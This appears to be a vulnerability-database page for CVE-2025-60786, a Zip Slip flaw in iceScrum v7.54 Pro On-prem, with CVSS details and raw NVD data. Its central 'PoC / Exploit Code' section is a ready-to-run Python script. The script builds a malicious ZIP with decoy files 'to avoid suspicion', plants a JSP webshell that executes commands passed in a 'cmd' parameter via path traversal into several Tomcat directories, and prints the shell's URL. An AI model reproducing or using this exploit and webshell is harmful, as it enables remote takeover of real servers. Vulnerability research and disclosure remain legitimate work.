Security Vulnerability Report
中文
CVE-2025-60786 CVSS 8.8 HIGH

CVE-2025-60786

Published: 2025-12-15 16:15:53
Last Modified: 2025-12-23 18:05:42

Description

A Zip Slip vulnerability in the import a Project component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via uploading a crafted Zip file.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kagilum:icescrum:*:*:*:*:pro:*:*:* - VULNERABLE
iceScrum v7.54 Pro On-prem

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60786 PoC - Zip Slip in iceScrum v7.54 # Author: Security Researcher # Description: Generate malicious ZIP file for path traversal exploit import zipfile import os def create_zip_slip_poc(): """ Create a malicious ZIP file with path traversal payload. The payload attempts to write a JSP webshell to the webapps directory. """ # Malicious JSP webshell content webshell_content = '''<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while(disr!=null){out.println(disr);disr=dis.readLine();}}%>''' output_file = 'CVE-2025-60786_poc.zip' with zipfile.ZipFile(output_file, 'w', zipfile.ZIP_DEFLATED) as zf: # Normal project file to avoid suspicion zf.writestr('project/icescrum.json', '{"name":"Test Project","version":"1.0"}') zf.writestr('project/tasks.json', '{"tasks":[]}') # Path traversal payload - Zip Slip attack # This path attempts to escape the intended extraction directory malicious_path = '../../webapps/icescrum/shell.jsp' zf.writestr(malicious_path, webshell_content) # Alternative paths for different server configurations alternative_paths = [ '../../tomcat/webapps/ROOT/shell.jsp', '../../../tomcat/webapps/ROOT/shell.jsp', '../../icescrum/webapps/shell.jsp' ] for alt_path in alternative_paths: zf.writestr(alt_path, webshell_content) print(f'[+] Created malicious ZIP file: {output_file}') print('[+] Use this file to exploit iceScrum import project feature') print('[+] After upload, access the shell at: /icescrum/shell.jsp?cmd=whoami') if __name__ == '__main__': create_zip_slip_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60786", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:52.807", "lastModified": "2025-12-23T18:05:42.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Zip Slip vulnerability in the import a Project component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via uploading a crafted Zip file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kagilum:icescrum:*:*:*:*:pro:*:*:*", "versionEndIncluding": "7.54", "matchCriteriaId": "9BCEE8C7-1F98-4F65-BD3F-900DE6A4E16C"}]}]}], "references": [{"url": "https://www.icescrum.com/download/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://zdaylabs.com/CVE-2025-60786.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}